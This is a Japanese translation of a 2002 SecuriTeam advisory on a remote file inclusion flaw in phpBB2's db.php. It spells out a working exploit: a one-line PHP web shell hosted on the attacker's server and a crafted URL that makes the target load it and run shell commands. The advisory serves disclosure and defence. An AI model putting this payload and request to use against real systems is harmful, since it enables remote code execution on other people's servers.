PhpBB2 リモート・コマンドの実行

［翻訳：関谷　麻美］
2002年3月18日

◆概要：
　phpbb_root_path 変数は、外部サーバからのスクリプトを受け入れる。結果、攻撃者により作成されたカスタム・スクリプトを使用したリモート実行コマンドに対し phpBB2 を脆弱にする。

◆詳細：
脆弱なシステム：
phpBB2 バージョン 2.0 RC-3 とそれ以前のバージョン
2002年3月18日以前の phpBB2 CVS バージョン

　"phpBB2 root path" 変数は、他の Web サイトからの入力を受け入れる。結果、リモート攻撃者は任意のコマンドをリモートで実行することができる。その脆弱性は、db.php が下記の入力を受け入れるという点にある。
'/phpBB2/includes/db.php?phpbb_root_path=full_path_to_script'
ここで、full_path_to_script は別の Web サーバからの完全な URL である。

　例えば、あなたのWeb サーバに 'db' と呼ばれるディレクトリを作成する。そして、この db ディレクトリに'mysql.txt' か 'mysql4.txt' あるいは 'postgres.txt' と呼ばれるファイルを作成する（他のファイル名は、機能しないと思われる）。

この mysql.txt は、下記の行を含む。

<? echo "<pre>"; system($cmd); ?>

次のステップは、あなたのブラウザに下記の URL を入力することだ。

http://example.com/phpBB2/includes/db.php?phpbb_root_path=http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a
あなたは、example.com の 'uname result' を取得できるだろう。

◆追加情報：
　pokley と nullbyte がこの脆弱性を発見した。

［情報提供：SecuriTeam］
http://www.securiteam.com/